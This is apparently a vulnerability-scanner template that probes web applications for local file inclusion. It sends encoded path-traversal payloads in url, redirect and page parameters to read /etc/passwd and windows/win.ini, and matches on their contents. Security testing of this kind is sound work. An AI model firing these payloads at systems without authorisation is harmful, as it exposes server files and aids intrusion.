id: arbitrary-file-read

info:
  name: Arbitrary File Read
  author: Sushant Kamble (https://in.linkedin.com/in/sushantkamble)
  severity: high
  description: Searches for /etc/passwd on passed URLs.
  tags: fuzz,lfi

requests:
  - method: GET
    path:
      - "{{BaseURL}}/?url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
      - "{{BaseURL}}/?redirect=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
      - "{{BaseURL}}/?page=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
      - "{{BaseURL}}/?redirect=..%2f..%2f..%2f..%2fwindows/win.ini"
      - "{{BaseURL}}/?page=..%2f..%2f..%2f..%2f..%2fwindows/win.ini"
      - "{{BaseURL}}/?url=..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: regex
        regex:
          - "root:[x*]:0:0:"
          - "\\[(font|extension|file)s\\]"
        condition: or
        part: body